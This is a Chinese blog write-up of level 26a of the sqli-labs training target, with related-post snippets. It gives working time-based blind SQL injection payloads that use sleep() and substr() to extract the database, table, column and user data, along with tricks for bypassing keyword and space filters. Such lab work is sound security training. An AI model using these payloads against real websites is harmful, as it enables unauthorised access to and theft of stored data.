SQL-labs的第26a关——空格和注释被过滤 延时盲注(Get)

已于 2023-08-04 16:10:56 修改
阅读量196 收藏
点赞数
文章标签: sql oracle 数据库
于 2023-08-04 15:57:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/132106478
版权

注意该关的or和and也被过滤了

1、判断闭合方式

输入语句

?id=1'

,返回页面如下:

我们猜测闭合符号是',再进行验证,输入语句

?id=1';%00

,返回页面如下:

依然报错,说明闭合符号除了'之外还有其他的符号,我们输入

?id=1');%00

,返回页面如下:

这说明闭合符号是')。

2、确定数据库名的长度

输入语句

?id=2')%26%26sleep(if(length(database())=8,0,2));%00

,对于这个语句,我们首先要知道,如果该数据库名的长度是8,那么页面的返回将没有任何的延迟,反之,将会有2秒的延迟之后才能看到返回的页面。

输入语句后无延迟,返回页面如下:

这说明数据库名的长度是8。

3、爆破数据库名

输入语句

?id=1')%26%26sleep(if((substr(database(),1,1)='s'),2,0));%00

,返回页面如下:

返回页面时延迟了2秒,所以数据库名的第一个单词是's'。通过修改substr(a,b,c)函数的第二个参数b,将它改为2,3,……这样就可以知道第2,3,……个字母是什么了,第三个参数c表示截取的字段的长度。这里是1。

4、爆破数据表名

输入语句

?id=1')%26%26sleep(if((substr((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=database())),1,1)='e'),2,0));%00

,返回页面如下:

延迟了两秒,说明第一个字母是'e',注意的一点是:这里我们截取的是所有表名加上逗号所组成的字符串的第一个字母,','也是其中的字符,我们根据逗号将多个表名区分开。

5、爆破列名

输入语句

?id=1') %26%26 sleep(if((substr((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_schema=database()) %26%26(table_name='users')),1,1)='i'),2,0));%00

,返回页面如下:

6、爆破字段内容

输入语句

?id=1') %26%26sleep(if(substr((select (group_concat(id)) from (users)),1,1)='1',2,0));%00

,返回页面如下:

到此打靶结束

Hacker-小胖锅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
(手工)【sqli-labs26、26a】拼接入、过滤
07-12 671
【SQL-拼接、过滤入】
sqli-labs 26a
weixin_47300936的博客
09-04 623
mysql会将'2'当作true,然后true and true为true,true则为1。执行的语句则是where id = '2' and '1'='1'执行的语句则是where id = ('2' and '1'='1')后面依次判断出字段名为id,username,password。,查询语句即为where id = ('$id'),查询语句即为where id = '$id'由图可知,回显id为1的信息,即闭合为')即2' and '1'='1。回显会是id为2的信息。回显会是id为1的信息。
sqli-labs第二十六二十六a
m0_73248913的博客
02-21 390
sqli-labs第二十六二十六a
SQL入一些过滤及绕过总结
最新发布
2301_76786857的博客
12-27 799
过滤键字应该是最常见的过滤了,因为只要把键字一过滤,你的入语句基本就不起作用了。(3)既然是过滤键字,大小写应该都会被匹配过滤,所以大小写绕过一般是行不通的。常见的几种入方法基本上都要使用逗号,要是逗号被过滤了,那就只能想办法绕过了。(2)对于的那几个函数substr(),mid(),limit。(1)最常用的绕过方法就是用/**/,,分割键字。(2)根据过滤程度,有候还可以用双写绕过。(1)简单入可以使用join方法绕过。(4)有候还可以使用编码绕过。
sqli-labs ————less -26a
Fly_鹏程万里
05-16 1003
Less-26a查看一下源代码:查询语句:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace(...
SQLi Labs Lesson26 & Lesson26a
1ame的博客
08-22 560
GET - Error based - All your SPACES and COMMENTS belong to us 首先进入欢迎界面: 本节标题是 所有的空格注释都没有卵用了。 根据上节内容,猜测应该是将空格注释符号替换为空串。 实际测试: 构造 ?id=1 结果如图所示: 构造 ?id=1' 在$id后多添加了一个单引号导致,闭合
SQLi LABS Less 26a 联合入+布尔
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第26a,SQLi-LABS Less-26a,SQLi-LABS Less 26a,SQLiLABS Less26a,SQLi Less 26a
Sqli-labs less 26a
weixin_34032827的博客
08-11 631
Less-26a 这与26的区别在于,sql语句添加了一个括号,同在sql语句执行抛出错误后并不在前台页面输出。所有我们排除报错入,这里依旧是利用union入。 sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1 我们构造payload: http://127.0.0.1/sqllib/Less-26a/?id=100'...
sql-labs26~31
qq_44663230的博客
09-03 2250
sql-labs26-28a 29~31暂不做
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
sql-labs技巧
03-01
SQL入常用靶场的通技巧
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
结合手工入编写一个SQL脚本——以SQLi-Labs less16为例.doc
07-09
结合手工入编写一个SQL脚本——以SQLi-Labs less16为例.doc
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(26a)
weixin_30920853的博客
05-28 697
0x01偷偷看一波源码 和26一样 闭合变成了’)而已 0X01构造语句爆库名 这是百度到的 第一个 ' 首先闭合id='$id' 中的',%a0是空格的意思,(ps:此处我的环境是ubuntu14.04+apache+mysql+php,可以解析%a0,此前在windows+wamp测试,不能解析%a0,有知情的请告知。)同%0b也是可以通过测试的,其他的经测试是不行的。||是或者...
sqlilabs第26a
wh1sper、的博客
05-17 432
sqlilabs第26a一、手 一、手 直接看源码 boolean过滤了and,空格,注释空格可以通过()或者%0a绕过。and可以用&&或者双写绕过(但这道题&&不行)。注释使用(‘1’='1闭合。 判断入点?id=1’) aandnd (‘1’='1 ?id=1') aandnd ('1'='1 爆库名?id=1’)aandnd(substr((database()),1,1)=‘s’)aandnd(‘1’='1 ?id=1')aandnd(subs
Sqli-labs之Less-26和Less-26a
m0_46315342的博客
06-04 1971
                                          &nbs...
Sqlilabs Less-26-26a Trick with spaces and comments
baynk的博客
03-31 464
Sqlilabs Less-26 Trick with spaces and comments with single quote 手工入 加quote报错,然后注释没效果,给出的提示看起来似乎是被过滤掉了,用之前手法闭合。然后发现and好像也被过滤了,继续双写试试,但是结果好像空格也被过滤了。。。用了各种编码都不行后,查了资料发现用%a0或者%0b替代(%a0好像是不间断空格,会在html显示...
sqli-lab学习笔记(学习笔记)(21-30)
大方子
08-21 5812
  打完21-30之后的后记:   后来发现,网上所有就是讲解sqli的,到后面都没有用查有多少字段数的order by这个语句,几乎都没有提到过,我自己也尝试在后面的变形中加入加入进去但是不知道为什么老是出错,现在我想到的办法就是   比如28a   语句是这样的 http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a...
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据。您可以使用以下命令在 MySQL 命令行中创建一个新数据库: ``` CREATE DATABASE sqli; ``` 4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `your_username` 为您的 MySQL 用户名,并输入密码进行验证。 5. 配置 SQL-Labs。进入 SQL-Labs 文件夹中的 `db.php` 文件,按照注释中的提示修改数据库连接信息,包括主机名、用户名、密码和数据库名称。 ``` $host = 'localhost'; $user = 'your_username'; $password = 'your_password'; $db = 'sqli'; ``` 6. 启动 Web 服务器,并在浏览器中访问 SQL-Labs。在浏览器中输入 `http://localhost/sql-labs/`,您应该能够看到 SQL-Labs 的登录页面。 现在,您已经成功安装并配置了 SQL-Labs。请确保仔细阅读项目的文档,了解如何正确使用和利用 SQL-Labs 的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值